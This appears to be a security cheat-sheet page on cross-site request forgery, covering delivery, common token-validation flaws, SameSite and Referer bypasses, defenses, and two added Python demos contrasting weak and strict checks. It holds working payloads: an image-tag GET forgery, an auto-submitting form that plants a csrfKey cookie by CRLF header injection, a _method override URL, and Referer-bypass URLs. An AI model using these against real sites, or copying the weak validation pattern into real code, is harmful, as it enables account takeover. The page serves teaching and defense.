# CSRF

Cross-site request forgery (CSRF) allows an attacker to induce users to perform actions that they do not intend to perform: the victim's browser is made to send a request to a site where the victim is authenticated, and it attaches the victim's cookies to that request.

## <mark style="color:red;">Deliver a CSRF Exploit</mark>

### <mark style="color:yellow;">**Delivery (as for reflected XSS)**</mark>

The delivery mechanisms are the same as for reflected XSS: the attacker places the malicious HTML on a web site that they control and lures the victim into visiting it while logged in to the vulnerable site.

### <mark style="color:yellow;">GET method</mark>

If the vulnerable action accepts GET, a single image tag is enough: the browser fetches the URL and sends the victim's cookies with it.

#### <mark style="color:purple;">**Example:**</mark>

```html
<img src="https://vulnerable-website.com/email/change?email=attacker@evil-user.net"> 
```

## <mark style="color:red;">Common CSRF vulnerabilities</mark>

* Some applications correctly validate the token when the request uses the POST method but skip the validation when the GET method is used.
* Some applications correctly validate the token when it is present but skip the validation if the token is omitted.
* Some applications do not validate that the token belongs to the same session as the user who is making the request.
* Some applications do tie the CSRF token to a cookie, but not to the same cookie that is used to track sessions. An attacker who can set a cookie in the victim's browser (for example through CRLF injection into a parameter that is reflected into a response header, as below) can plant a `csrfKey` cookie and submit the token that goes with it.

#### <mark style="color:purple;">**Example:**</mark>

```html
<html>
  <body>
    <!-- Forged POST. The csrf value is the attacker's own token; its matching
         csrfKey cookie is planted in the victim's browser by the image below. -->
    <form action="https://vul-site.com/change-email" method="POST">
      <input type="hidden" name="email" value="hacker&#64;yahoo&#46;com" />
      <input type="hidden" name="csrf" value="jyLqs10iSdsMQz1S5jqucMF55ZyDRyQL" />
      <input type="submit" value="Submit request" />
    </form>
    <!-- The search parameter is reflected into a response header, so the encoded
         CRLF (%0d%0a) injects "Set-Cookie: csrfKey=your-key" (your-key = the
         attacker's own csrfKey value). The image fails to load, and onerror
         then submits the form above with both cookie and token in place. -->
    <img src="https://vul-site.com/?search=test%0d%0aSet-Cookie:%20csrfKey=your-key" onerror="document.forms[0].submit()">
  </body>
</html>
```

* Some applications do not maintain any server-side record of tokens that have been issued (the double-submit cookie pattern); an attacker who can set a cookie can then supply any cookie/token pair that matches.
* Cookie **SameSite=Lax** bypass via method override. A Lax cookie is sent on a top-level cross-site GET navigation but not on a cross-site POST, so the attacker reaches the state-changing handler through a GET that the framework reinterprets as a POST.
* Change the **POST** method to **GET** with the **`_method`** parameter.

#### <mark style="color:purple;">Example:</mark>

`/change-email?email=attacker@attack.net&_method=POST`
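The following is an added example, not code from the page: an in-memory model of the weak CSRF checks listed above (token only on POST, check skipped when the token is absent, token tied to a `csrfKey` cookie rather than the session, `_method` override) next to a strict check, exercised with forged requests shaped like the page's payloads. `Server`, `Request`, the cookie-jar layout and the `cookies_attached()` browser model are hypothetical and reproduce no real framework; the SameSite=Lax rule it encodes (Lax cookies travel cross-site only on top-level safe-method navigations) is the standard browser behaviour.

```python
"""Added example: weak vs strict CSRF validation, with forged requests.
All names and the cookie-jar layout are hypothetical."""
import secrets

SAFE_METHODS = ("GET", "HEAD")


def cookies_attached(jar, method, cross_site, top_level):
    """Browser side. jar maps cookie name -> (value, SameSite attribute).
    A SameSite=Lax cookie is sent cross-site only on a top-level navigation
    with a safe method, which is exactly what the _method override exploits."""
    sent = {}
    for name, (value, samesite) in jar.items():
        if not cross_site or samesite == "None":
            sent[name] = value
        elif samesite == "Lax" and top_level and method in SAFE_METHODS:
            sent[name] = value
    return sent


class Request:
    def __init__(self, method, params, cookies):
        self.method, self.params, self.cookies = method, params, cookies


class Server:
    def __init__(self):
        self.sessions = {}  # session id -> {"user", "csrf", "email"}

    def login(self, user):
        sid = secrets.token_hex(16)
        self.sessions[sid] = {"user": user, "csrf": secrets.token_urlsafe(24)}
        return sid

    def weak_check(self, req):
        """The flawed checks from the list above, combined in one handler."""
        method = req.params.get("_method", req.method).upper()  # method override
        if method != "POST":                 # flaw: token only checked on POST
            return True
        if "csrf" not in req.params:         # flaw: check skipped when token absent
            return True
        # flaw: token tied to a csrfKey cookie, not to the session cookie
        return req.params["csrf"] == req.cookies.get("csrfKey")

    def strict_check(self, req):
        """Token required on every state-changing request and compared with
        the value stored in the requester's own session."""
        if req.method.upper() in SAFE_METHODS:
            return False                     # never change state on GET/HEAD
        sess = self.sessions.get(req.cookies.get("session"))
        if sess is None:
            return False
        return secrets.compare_digest(sess["csrf"], req.params.get("csrf", ""))

    def change_email(self, req, check):
        """Returns True if the request succeeded in changing the email."""
        sess = self.sessions.get(req.cookies.get("session"))
        if sess is None or not check(req):
            return False
        sess["email"] = req.params["email"]
        return True


def forged(server, jar, method, params, top_level):
    """Send one cross-site request; return (weak_result, strict_result)."""
    cookies = cookies_attached(jar, method, cross_site=True, top_level=top_level)
    req = Request(method, params, cookies)
    return (server.change_email(req, server.weak_check),
            server.change_email(req, server.strict_check))


def get_without_token():
    """The <img src="...change?email=..."> payload: cross-site GET, no token."""
    s = Server()
    jar = {"session": (s.login("victim"), "None")}
    return forged(s, jar, "GET", {"email": "attacker@evil-user.net"}, top_level=False)


def post_with_token_omitted():
    """Auto-submitted POST form with the csrf field simply left out."""
    s = Server()
    jar = {"session": (s.login("victim"), "None")}
    return forged(s, jar, "POST", {"email": "hacker@yahoo.com"}, top_level=True)


def post_with_planted_csrf_key():
    """The page's Set-Cookie injection: csrfKey=your-key is planted, then a
    form whose csrf field matches that key is submitted."""
    s = Server()
    jar = {"session": (s.login("victim"), "None"), "csrfKey": ("your-key", "None")}
    return forged(s, jar, "POST", {"email": "hacker@yahoo.com", "csrf": "your-key"}, top_level=True)


def lax_cookie_method_override():
    """Session cookie is SameSite=Lax: the cross-site POST arrives without it
    and fails, but a top-level GET with _method=POST arrives with it, is routed
    as a POST, and then falls through the remaining weak checks."""
    s = Server()
    jar = {"session": (s.login("victim"), "Lax")}
    blocked_post = forged(s, jar, "POST", {"email": "attacker@attack.net"}, top_level=True)
    override_get = forged(s, jar, "GET", {"email": "attacker@attack.net", "_method": "POST"}, top_level=True)
    return blocked_post, override_get
```

Each scenario returns `(weak, strict)`: the weak handler accepts all four forged requests while the strict one rejects them, and the Lax scenario shows that the cookie attribute alone stops the POST form but not the GET override.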

## <mark style="color:red;">Defenses</mark>

* [x] CSRF tokens: unpredictable, tied to the user's session, and validated on every state-changing request regardless of method.
* [x] HTTP cookie header (CSRF-key): the double-submit pattern, where the token is also held in a cookie and the two must match; only sound if an attacker cannot set cookies for the site.
* [x] Captcha.
* [x] HTTP Referer header: validate the parsed origin of the header, not a substring or prefix match, and do not skip the check when the header is absent.
* [x] SameSite cookies on the session cookie (Strict, or Lax with the method-override bypass above in mind).
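An added example (not the page's own code) for the Referer-header defence listed above: two loose checks of the kind that are routinely bypassed, next to a strict check that parses the header and compares the origin. The bypass URLs go slightly beyond the page's text (trusted name in the query string, as a subdomain prefix, and as userinfo), and `vul-site.com` / `attacker.net` are placeholder hosts.

```python
"""Added example: Referer-header validation done loosely and done strictly.
Host names are placeholders; the sample URLs are constructed for this demo."""
from urllib.parse import urlsplit

TRUSTED_HOST = "vul-site.com"


def referer_check_substring(referer):
    """Bypassed by putting the trusted name anywhere in the URL, e.g. the query."""
    return referer is not None and TRUSTED_HOST in referer


def referer_check_prefix(referer):
    """Bypassed by a host that merely starts with the trusted name, or by a
    userinfo part (https://vul-site.com@attacker.net/)."""
    return referer is not None and referer.startswith("https://" + TRUSTED_HOST)


def referer_check_strict(referer):
    """Parse the URL and compare scheme and hostname exactly. A missing header
    is rejected too: an attacker page can suppress Referer (for example with
    <meta name="referrer" content="no-referrer">), so absent must not mean ok."""
    if not referer:
        return False
    parts = urlsplit(referer)
    return parts.scheme == "https" and parts.hostname == TRUSTED_HOST


# Constructed samples: the first is a legitimate same-site Referer, the next
# three are attacker-controlled URLs, and None models a suppressed header.
SAMPLES = {
    "https://vul-site.com/my-account": True,
    "https://attacker.net/?vul-site.com": False,
    "https://vul-site.com.attacker.net/csrf": False,
    "https://vul-site.com@attacker.net/": False,
    None: False,
}


def evaluate(check):
    """Map each sample Referer to whether `check` accepts it."""
    return {ref: check(ref) for ref in SAMPLES}


def is_sound(check):
    """True only if the check agrees with the expected verdict on every sample."""
    return all(check(ref) == legit for ref, legit in SAMPLES.items())
```

Run `evaluate()` against each of the three checks to see which attacker URLs slip through; only the strict parse-and-compare check accepts the legitimate Referer and nothing else.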

